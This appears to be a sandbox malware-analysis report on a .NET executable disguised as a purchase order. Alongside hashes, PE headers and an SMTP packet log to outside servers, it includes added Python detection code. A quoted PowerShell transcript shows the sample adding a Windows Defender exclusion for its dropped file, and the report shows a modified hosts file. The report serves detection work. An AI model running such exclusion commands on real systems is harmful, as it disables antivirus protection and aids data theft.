                                                SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):5781
                                                Entropy (8bit):5.404314265626119
                                                Encrypted:false
                                                SSDEEP:96:BZ3haN1qDo1ZRZMhaN1qDo1ZyV/p3jZShaN1qDo1ZJmHHnZw:lf
                                                MD5:F99E986A7442F13FED06A4728EEF4F0A
                                                SHA1:BA02D7F433434035A407C6F404849D25C7F25408
                                                SHA-256:5EA7582B7E73D2F59CAF50E0254BC1D20B3D3F228D35FBEBAC6CB118D3E513FA
                                                SHA-512:94821D2FDE5A93181462F32EA12BAA61320817963E94315F7ED847D98F0E2F2A8936DE78248C4361CB7D090524CEBAB8A39701B40B9483EAAD7E3BC460244F15
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:.**********************..Windows PowerShell transcript start..Start time: 20220514113644..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 035347 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\NpPgfycY.exe..Process ID: 6948..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220514113644..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\NpPgfycY.exe..**********************..Windows PowerShell transcript start..Start time: 20220514113944..Username: computer\user..RunAs User: computer\user..C
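Added example, not from the report or the sample: detection logic that walks a PowerShell transcript like the one above, groups it into sessions, and reports every `Add-MpPreference` exclusion together with whether its target sits in a user-writable location. The log it runs over is constructed: the first session reproduces the transcript in the preview (the preview's `..` is CRLF), the second session and its process ID are made up for contrast because the preview is cut off there.

```python
import re

# Constructed log. The first session reproduces the transcript in the report's
# preview (".." there is CRLF); the second is a made-up benign session for
# contrast, since the preview is cut off at that point.
SAMPLE_TRANSCRIPT = (
    "**********************\r\n"
    "Windows PowerShell transcript start\r\n"
    "Start time: 20220514113644\r\n"
    "Username: computer\\user\r\n"
    "RunAs User: computer\\user\r\n"
    "Configuration Name: \r\n"
    "Machine: 035347 (Microsoft Windows NT 10.0.17134.0)\r\n"
    "Host Application: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "Add-MpPreference -ExclusionPath C:\\Users\\user\\AppData\\Roaming\\NpPgfycY.exe\r\n"
    "Process ID: 6948\r\n"
    "PSVersion: 5.1.17134.1\r\n"
    "**********************\r\n"
    "**********************\r\n"
    "Command start time: 20220514113644\r\n"
    "**********************\r\n"
    "PS>Add-MpPreference -ExclusionPath C:\\Users\\user\\AppData\\Roaming\\NpPgfycY.exe\r\n"
    "**********************\r\n"
    "Windows PowerShell transcript start\r\n"
    "Start time: 20220514113944\r\n"
    "Username: computer\\user\r\n"
    "RunAs User: computer\\user\r\n"
    "Host Application: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\n"
    "Process ID: 7012\r\n"
    "**********************\r\n"
    "PS>Get-MpPreference\r\n"
)

# Locations a standard user can write to; an exclusion there shields a dropper's
# own staging directory rather than an installed application.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents)\\|\\Temp\\|\\ProgramData\\",
    re.IGNORECASE,
)
EXCLUSION_PARAMS = ("-ExclusionPath", "-ExclusionProcess", "-ExclusionExtension")
# One parameter value: double-quoted, single-quoted, or bare. The bare form is
# last so a quoted path with spaces is not cut at the first space.
VALUE = r'''\s+(?:"([^"]*)"|'([^']*)'|(\S+))'''


def split_transcripts(text: str) -> list:
    """Group a transcript file into sessions: start time, host application, commands."""
    sessions, current = [], None
    for line in text.splitlines():
        if line == "Windows PowerShell transcript start":
            current = {"start": None, "host": None, "commands": []}
            sessions.append(current)
        elif current is None:
            continue
        elif line.startswith("Start time: "):
            current["start"] = line[len("Start time: "):]
        elif line.startswith("Host Application: "):
            current["host"] = line[len("Host Application: "):]
        elif line.startswith("PS>"):
            current["commands"].append(line[3:])
    return sessions


def find_defender_exclusions(text: str) -> list:
    """Report every Add-MpPreference exclusion in the transcript and whether its
    target lies in a user-writable location."""
    findings = []
    for session in split_transcripts(text):
        for cmd in session["commands"]:
            m = re.search(r"\bAdd-MpPreference\b(.*)", cmd, re.IGNORECASE)
            if not m:
                continue
            for param in EXCLUSION_PARAMS:
                for groups in re.findall(re.escape(param) + VALUE, m.group(1), re.IGNORECASE):
                    picked = next((g for g in groups if g), "")
                    # The parameters accept comma-separated lists.
                    for target in (t.strip() for t in picked.split(",") if t.strip()):
                        findings.append({
                            "time": session["start"],
                            "parameter": param,
                            "target": target,
                            "user_writable": bool(USER_WRITABLE.search(target)),
                            "host_application": session["host"],
                        })
    return findings
```

The same condition can be hunted outside transcripts: `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` lists the exclusions currently in force on a host, and Defender logs each preference change as event 5007 in the Microsoft-Windows-Windows Defender/Operational channel.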
                                                Process:C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):835
                                                Entropy (8bit):4.694294591169137
                                                Encrypted:false
                                                SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
                                                MD5:6EB47C1CF858E25486E42440074917F2
                                                SHA1:6A63F93A95E1AE831C393A97158C526A4FA0FAAE
                                                SHA-256:9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
                                                SHA-512:08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
                                                Malicious:true
                                                Reputation:unknown
                                                Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1
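Added example, not from the report or the sample: a hosts-file check that separates the stock Windows template, which contains only comments, from entries that have been appended to it, and classifies each active mapping as blocking (loopback or unspecified address) or redirection (any other address). The input is constructed: the template lines match the preview, but the preview stops right after the appended `127.0.0.1`, so the host name on that line is made up and not the one the sample wrote.

```python
import ipaddress

# Constructed input: the default Windows hosts template, as in the report's
# preview, followed by one appended line. The preview cuts off after the
# "127.0.0.1" of that line, so the host name here is made up.
SAMPLE_HOSTS = """# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#\t127.0.0.1       localhost
#\t::1             localhost

127.0.0.1 blocked-host.example
"""

# Addresses that turn a mapping into a block rather than a redirect.
SINKHOLE_ADDRS = {"127.0.0.1", "0.0.0.0", "::1", "::"}


def parse_hosts(text: str) -> list:
    """Return the active mappings as (line_no, address, names); comments and blank
    lines are skipped, and a line whose first field is not an IP address is kept
    with address None so it is not silently lost."""
    entries = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        try:
            addr = str(ipaddress.ip_address(parts[0]))
        except ValueError:
            entries.append((n, None, parts))
            continue
        entries.append((n, addr, parts[1:]))
    return entries


def suspicious_hosts_entries(text: str, expected_local=("localhost",)) -> list:
    """Flag every active mapping: names pinned to a sinkhole address are blocked,
    anything else is a redirect. The stock file has no active lines at all."""
    findings = []
    for n, addr, names in parse_hosts(text):
        if addr is None:
            findings.append({"line": n, "kind": "malformed", "names": names, "address": None})
        elif addr in SINKHOLE_ADDRS:
            blocked = [h for h in names if h not in expected_local]
            if blocked:
                findings.append({"line": n, "kind": "blocked", "names": blocked, "address": addr})
        else:
            findings.append({"line": n, "kind": "redirected", "names": names, "address": addr})
    return findings
```

Run it on `C:\Windows\System32\drivers\etc\hosts` read as text; the file in the report is the only dropped file here that the sample both modified and that persists across reboots without a process of its own.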
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.7510737607081515
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:Purchase order 450080088 proj. Allt Charnan.exe
                                                File size:677888
                                                MD5:152ef22896bf39197d210d40171e898a
                                                SHA1:bdd88e03d9131d7f35e0bfadbed02010d231a1bd
                                                SHA256:5a3834895f08aff701a029275074d4ab47aff4951d6f75e8393b0a97cb8f6031
                                                SHA512:b4648e8c09c4958d80c9f08801d9bd9e3e2651dd194a71db30d9ba1c84ee448823f97c1550fbd476863046398cae26e533aa504e7bb297dd53287f52a0d4c928
                                                SSDEEP:12288:TuXha3wv5LRtvlWwlCBYB6xLKWvV+smSe2r5uLd/zUoylGey4:aY05vlRlCBOMLKZSes8d/zlyN
                                                TLSH:67E4F13DF1F79E22C35D26B2C0C65A0443B44AAAA637E35B2B4581D59D03BF789887C7
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V.~b..............0..P...........n... ........@.. ....................................@................................
                                                Icon Hash:00828e8e8686b000
                                                Entrypoint:0x4a6ece
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                Time Stamp:0x627E0356 [Fri May 13 07:05:58 2022 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:v4.0.30319
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
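Added example, not from the report or the sample: a reader for the header fields listed above (entry point, image base, CLR header) that also checks what the entry-point listing that follows shows, namely that the native entry of a .NET image is a single `jmp dword ptr [IAT slot]` into the import address table (the loader fills that slot with the CLR's `_CorExeMain`), after which the bytes are zero padding. The sample's entry RVA is 0x4a6ece - 0x400000 = 0xa6ece; the example builds a minimal PE32 in memory instead of reading the malware, with the same stub layout, and that constructed image is the only thing it runs on.

```python
import struct

IMAGE_DIRECTORY_ENTRY_IAT = 12
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14   # the CLR (.NET) header


def inspect_pe(data: bytes) -> dict:
    """Read enough of a PE32 file to say whether it is a .NET assembly whose native
    entry point is the usual 'jmp dword ptr [IAT slot]' stub."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                                   # start of the optional header
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(ndirs)]

    sections = []
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), va, max(vsize, rawsize), rawptr))

    def rva_to_offset(rva):
        for _, va, size, rawptr in sections:
            if va <= rva < va + size:
                return rawptr + (rva - va)
        raise ValueError("RVA 0x%X is not backed by any section" % rva)

    clr_rva, clr_size = dirs[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR] if ndirs > 14 else (0, 0)
    iat_rva, iat_size = dirs[IMAGE_DIRECTORY_ENTRY_IAT] if ndirs > 12 else (0, 0)

    stub = data[rva_to_offset(entry_rva):][:6]
    is_jmp_indirect = stub[:2] == b"\xff\x25"            # FF 25 disp32: jmp dword ptr [disp32]
    target_va = struct.unpack_from("<I", stub, 2)[0] if is_jmp_indirect else None
    target_in_iat = is_jmp_indirect and iat_rva <= target_va - image_base < iat_rva + iat_size

    return {
        "machine": machine,
        "image_base": image_base,
        "entry_rva": entry_rva,
        "entry_section": next(n for n, va, size, _ in sections if va <= entry_rva < va + size),
        "entry_disasm": "jmp dword ptr [%08Xh]" % target_va if is_jmp_indirect else stub.hex(),
        "has_clr_header": clr_rva != 0 and clr_size != 0,
        "entry_is_clr_stub": is_jmp_indirect and target_in_iat,
    }


def build_minimal_dotnet_pe() -> bytes:
    """Constructed stand-in for the sample: a PE32 with one .text section holding an
    IAT slot at RVA 0x2000, a CLR header at RVA 0x2008 and, at the entry point,
    FF 25 00 20 40 00 (jmp dword ptr [00402000h]) followed by zero padding."""
    image_base, text_rva, text_raw, text_size = 0x400000, 0x2000, 0x200, 0x200
    iat_rva, clr_rva, entry_rva = 0x2000, 0x2008, 0x2050

    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                                  # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)       # i386, 1 section
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                                     # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)                                # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)                           # section/file alignment
    struct.pack_into("<I", opt, 92, 16)                                       # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_IAT, iat_rva, 4)
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, clr_rva, 72)
    section = struct.pack("<8sIIIIIIHHI", b".text", text_size, text_rva, text_size, text_raw,
                          0, 0, 0, 0, 0x60000020)                              # code, exec, read
    headers = (bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + section).ljust(text_raw, b"\0")

    text = bytearray(text_size)                                               # zero padding everywhere else
    struct.pack_into("<I", text, clr_rva - text_rva, 72)                      # IMAGE_COR20_HEADER.cb
    struct.pack_into("<HH", text, clr_rva - text_rva + 4, 2, 5)               # runtime version 2.5
    stub = b"\xff\x25" + struct.pack("<I", image_base + iat_rva)
    text[entry_rva - text_rva:entry_rva - text_rva + 6] = stub
    return headers + bytes(text)
```

When `entry_is_clr_stub` and `has_clr_header` are both true, the native entry point tells you nothing about the program; the code to look at is the managed entry method named in the CLR header's metadata, which is where the report's ".NET source code" signatures (dynamic method invocation, large array initialisations, native API references) come from.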
                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa6e80 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa8000 | 0x394 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xaa000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xa6e2a | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xa4ed4 | 0xa5000 | False | 0.873976089015 | data | 7.75961172037 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0xa8000 | 0x394 | 0x400 | False | 0.3779296875 | data | 2.89820511278 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xaa000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_VERSION | 0xa8058 | 0x33c | data | |
DLL | Import
mscoree.dll | _CorExeMain
Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2017
Assembly Version | 1.0.0.0
InternalName | SZArrayEnumera.exe
FileVersion | 1.0.0.0
CompanyName |
LegalTrademarks |
Comments |
ProductName | ResetEvent
ProductVersion | 1.0.0.0
FileDescription | ResetEvent
OriginalFilename | SZArrayEnumera.exe
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 14, 2022 11:37:05.771193981 CEST | 49747 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:37:05.993397951 CEST | 587 | 49747 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:37:05.995455027 CEST | 49747 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:37:07.157839060 CEST | 587 | 49747 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:37:07.158174992 CEST | 49747 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:37:09.159976006 CEST | 587 | 49747 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:37:09.160301924 CEST | 49747 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:37:10.559385061 CEST | 587 | 49747 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:37:10.559766054 CEST | 49747 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:37:10.781893969 CEST | 587 | 49747 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:37:10.782027960 CEST | 587 | 49747 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:37:10.783271074 CEST | 49747 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:37:11.317747116 CEST | 587 | 49747 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:37:11.317868948 CEST | 49747 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:37:11.405200958 CEST | 49747 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:37:11.628443956 CEST | 587 | 49747 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:37:11.628912926 CEST | 49747 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:37:11.853620052 CEST | 587 | 49747 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:37:11.854393959 CEST | 49747 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:37:12.079016924 CEST | 587 | 49747 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:37:12.079271078 CEST | 49747 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:37:12.321695089 CEST | 587 | 49747 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:37:12.327233076 CEST | 49747 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:37:12.809250116 CEST | 49747 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:37:12.857587099 CEST | 587 | 49747 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:37:12.858903885 CEST | 49747 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:37:13.606168985 CEST | 49747 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:37:15.215701103 CEST | 49747 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:37:15.439024925 CEST | 587 | 49747 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:37:15.439127922 CEST | 49747 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:37:15.872628927 CEST | 49752 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:37:16.545691013 CEST | 587 | 49747 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:37:16.545902014 CEST | 49747 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:37:17.689683914 CEST | 587 | 49747 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:37:17.690489054 CEST | 49747 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:37:18.919081926 CEST | 49752 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:37:24.919596910 CEST | 49752 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:37:36.930541992 CEST | 49752 | 587 | 192.168.2.3 | 162.222.225.16
May 14, 2022 11:37:39.920793056 CEST | 49752 | 587 | 192.168.2.3 | 162.222.225.16
May 14, 2022 11:37:40.141374111 CEST | 587 | 49752 | 162.222.225.16 | 192.168.2.3
May 14, 2022 11:37:40.141472101 CEST | 49752 | 587 | 192.168.2.3 | 162.222.225.16
May 14, 2022 11:37:40.828701973 CEST | 587 | 49752 | 162.222.225.16 | 192.168.2.3
May 14, 2022 11:37:40.828891039 CEST | 49752 | 587 | 192.168.2.3 | 162.222.225.16
May 14, 2022 11:37:41.049647093 CEST | 587 | 49752 | 162.222.225.16 | 192.168.2.3
May 14, 2022 11:37:41.049762011 CEST | 587 | 49752 | 162.222.225.16 | 192.168.2.3
May 14, 2022 11:37:41.049993992 CEST | 49752 | 587 | 192.168.2.3 | 162.222.225.16
May 14, 2022 11:37:41.271897078 CEST | 587 | 49752 | 162.222.225.16 | 192.168.2.3
May 14, 2022 11:37:41.272609949 CEST | 49752 | 587 | 192.168.2.3 | 162.222.225.16
May 14, 2022 11:37:41.496193886 CEST | 587 | 49752 | 162.222.225.16 | 192.168.2.3
May 14, 2022 11:37:41.496411085 CEST | 49752 | 587 | 192.168.2.3 | 162.222.225.16
May 14, 2022 11:37:42.029009104 CEST | 587 | 49752 | 162.222.225.16 | 192.168.2.3
May 14, 2022 11:37:42.029138088 CEST | 49752 | 587 | 192.168.2.3 | 162.222.225.16
May 14, 2022 11:37:42.108721972 CEST | 49752 | 587 | 192.168.2.3 | 162.222.225.16
May 14, 2022 11:37:42.718844891 CEST | 49752 | 587 | 192.168.2.3 | 162.222.225.16
May 14, 2022 11:37:42.941464901 CEST | 587 | 49752 | 162.222.225.16 | 192.168.2.3
May 14, 2022 11:37:42.941850901 CEST | 49752 | 587 | 192.168.2.3 | 162.222.225.16
May 14, 2022 11:37:43.174514055 CEST | 587 | 49752 | 162.222.225.16 | 192.168.2.3
May 14, 2022 11:37:43.174971104 CEST | 49752 | 587 | 192.168.2.3 | 162.222.225.16
May 14, 2022 11:37:43.396542072 CEST | 587 | 49752 | 162.222.225.16 | 192.168.2.3
May 14, 2022 11:37:43.396626949 CEST | 49752 | 587 | 192.168.2.3 | 162.222.225.16
May 14, 2022 11:38:17.319211006 CEST | 49823 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:17.541548014 CEST | 587 | 49823 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:17.541661978 CEST | 49823 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:17.770459890 CEST | 587 | 49823 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:17.770930052 CEST | 49823 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:18.305701971 CEST | 587 | 49823 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:18.308371067 CEST | 49823 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:18.424050093 CEST | 49823 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:19.221009970 CEST | 49823 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:19.443434954 CEST | 587 | 49823 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:19.443476915 CEST | 587 | 49823 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:19.443802118 CEST | 49823 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:20.649733067 CEST | 587 | 49823 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:20.649828911 CEST | 49823 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:22.111876011 CEST | 49823 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:27.252902985 CEST | 49823 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:27.453726053 CEST | 587 | 49823 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:27.455028057 CEST | 49823 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:27.657000065 CEST | 587 | 49823 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:27.657284021 CEST | 49823 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:27.858243942 CEST | 587 | 49823 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:27.858702898 CEST | 49823 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:28.080161095 CEST | 587 | 49823 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:28.081532001 CEST | 49823 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:28.281615973 CEST | 587 | 49823 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:28.281754971 CEST | 49823 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:31.937253952 CEST | 49837 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:32.137037992 CEST | 587 | 49837 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:32.137238026 CEST | 49837 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:32.531996012 CEST | 587 | 49837 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:32.535051107 CEST | 49837 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:32.734637022 CEST | 587 | 49837 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:32.734733105 CEST | 587 | 49837 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:32.735054970 CEST | 49837 | 587 | 192.168.2.3 | 208.91.198.38
May 14, 2022 11:38:32.935878038 CEST | 587 | 49837 | 208.91.198.38 | 192.168.2.3
May 14, 2022 11:38:32.936386108 CEST | 49837 | 587 | 192.168.2.3 | 208.91.198.38
